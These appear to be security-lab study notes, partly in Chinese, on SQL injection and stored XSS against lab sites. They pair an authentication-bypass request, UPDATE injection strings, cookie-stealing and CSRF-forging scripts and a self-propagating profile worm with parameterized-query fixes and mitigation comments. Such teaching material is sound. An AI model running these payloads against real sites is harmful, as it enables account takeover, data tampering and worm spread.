yyy修改为yyy' 造成SQL出错,动态页面返回错误提示信息。
yyy修改为yyy and 1=1 不对查询条件造成任何影响,返回正常页面。
yyy修改为yyy and 1=2 查询不到任何信息。
利用数据库服务器的系统变量。
利用数据库服务器的系统表进行判断。
猜解后台口令表表名。
猜解字段名。
猜解字段值: 二分法逼近。
口令可能为MD5散列后的密文。
Wpoison:能够在动态Web文档中找出SQL注入漏洞的工具。
mieliekoek.pl:以网站镜像工具生成的输出为输入,找出含有表单页面。
SPIKE Proxy工具:允许使用者对待注入字符串进行定制。
SPI Toolkit工具包中的“SQL Injector”工具。
输入验证: 对用户提交数据进行尽可能严格的验证与过滤。
输出净化: HTMLEncode()方法。
消除危险的输入点。
-- Vulnerable form (the lab's "unsafe" login query): $input_name and $hashed_pwd are spliced
-- into the SQL text, so a quote inside the name ends the string literal and anything after it
-- becomes part of the statement (a trailing comment marker discards the Password check).
-- Fix: a prepared statement with bound parameters; request values must never be concatenated into SQL.
SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email, nickname, Password FROM credential WHERE name= '$input_name' and Password='$hashed_pwd';
# Request as recorded in the lab: %27 is a single quote and %23 is '#'. The quote closes the
# name literal and '#' comments out the remainder of the WHERE clause, which is why the query
# above must bind the username instead of interpolating it.
# Defender note: URL-decoded quote/comment characters in the username parameter are a cheap
# log-based detection signal for this class of probe.
curl 'www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%20%23'
', salary='999666' where EID='10000';#
', salary='0.1' where name='Boby';#
(这数据还是个整型保存)', Password='(sha1值)' where Name='Boby';#
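// Parameterized login query: the submitted name and the SHA-1 of the submitted password are
// bound as values, so quote or comment characters in them cannot change the statement's shape.
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
// mysqli type string: one character per placeholder, "s" = string. The original "???" is not a
// valid type specifier and its length did not match the two bound variables, so bind_param would fail.
$sql->bind_param("ss", $input_uname, $hashed_pwd);
$sql->execute();
// Output columns in SELECT order; the variables stay unset when no row matched.
$sql->bind_result($id, $name, $eid, $salary, $birth, $ssn, $phoneNumber, $address, $email, $nickname, $pwd);
// NOTE(review): fetch() returns true only when a row was found — the code that follows (not
// shown here) should test that before treating the user as authenticated.
$sql->fetch();
$sql->close();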
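if ($input_pwd != '') {
    // Password field is not empty: hash it and refresh the copy kept in the session.
    // sha1() matches the format already stored in credential.Password for this lab; a real
    // application should store password_hash() output instead of an unsalted digest.
    $hashed_pwd = sha1($input_pwd);
    $_SESSION['pwd'] = $hashed_pwd;
    // Every value, including the row id, is a bound parameter. The original spliced $id into the
    // SQL text ("where ID=$id"), which reintroduces injection if $id is ever taken from the request.
    // Type string: five strings, then "i" for the id — assumes ID is an integer column; TODO confirm against the schema.
    // The original "xxxxx" is not a valid mysqli type specifier.
    $sql = $conn->prepare("UPDATE credential SET nickname= ?,email= ?,address= ?,Password= ?,PhoneNumber= ? where ID= ?;");
    $sql->bind_param("sssssi", $input_nickname, $input_email, $input_address, $hashed_pwd, $input_phonenumber, $id);
    $sql->execute();
    $sql->close();
} else {
    // Password field is empty: update the profile columns and leave the stored password untouched.
    $sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=?;");
    $sql->bind_param("ssssi", $input_nickname, $input_email, $input_address, $input_phonenumber, $id);
    $sql->execute();
    $sql->close();
}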
<!-- Probe payload: the alert only proves that the input reached the page without HTML encoding. -->
<script>alert('XSS');</script>
<!-- Same probe, showing that injected script can read document.cookie; marking the session cookie HttpOnly keeps it out of reach of script. -->
代码并保存。<script> alert(document.cookie);</script>
<!-- Exfiltration variant: the cookie leaves the browser as an image request ("ip+端口" is the page's placeholder for the receiving host). The mitigation is the same: encode stored content on output and set HttpOnly on the session cookie. -->
<script>document.write('<img src=http://ip+端口?c='+escape(document.cookie) + ' >');</script>
<!-- Forged friend-add request issued from the victim's own session. The script reads the anti-CSRF values (__elgg_ts, __elgg_token) from elgg.security.token, so CSRF tokens give no protection once stored XSS executes in-origin; the defence is to stop the stored XSS itself by encoding profile fields on output. -->
<script type="text/javascript">window.onload = function () { var Ajax=null;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token; //Construct the HTTP request to add Samy as a friend.var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44"+ts+token;//Create and send Ajax request to add friendAjax=new XMLHttpRequest();Ajax.open("GET",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); Ajax.send();} </script>
<!-- Forged profile edit from the victim's session; the guid comparison only skips the lab account with guid 44. As with the friend-add script, the CSRF token check is satisfied because the script runs in-origin, so the server-side fix is output encoding of the description field rather than a stronger token. -->
<script type="text/javascript">window.onload = function(){ //JavaScript code to access user name, user guid, Time Stamp __elgg_ts //and Security Token __elgg_tokenvar userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token; var content=token+ts+"name="+userName+"&description=<p>hello my friends~.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid; var sendurl = "http://www.xsslabelgg.com/action/profile/edit"; var samyGuid=44; if(elgg.session.user.guid!=samyGuid){ //Create and send Ajax request to modify profile var Ajax=null; Ajax=new XMLHttpRequest(); Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(content); }}</script>
<!-- Self-propagating variant of the profile-edit script: it reads its own source through getElementById("worm").innerHTML and includes it in the description it posts, so each viewer's profile becomes a new carrier. The exploited defect is the same stored-XSS sink in the profile description; encoding that field on output stops both the payload and its replication. -->
<script id="worm" type="text/javascript">window.onload = function(){var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";var jsCode = document.getElementById("worm").innerHTML;var tailTag = "</" + "script>"; var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;//Construct the content of your url.var content= token + ts + "&name=" + userName + "&description=<p>hello my firends~ "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"alert(content)var samyGuid=44;if(elgg.session.user.guid!=samyGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}</script>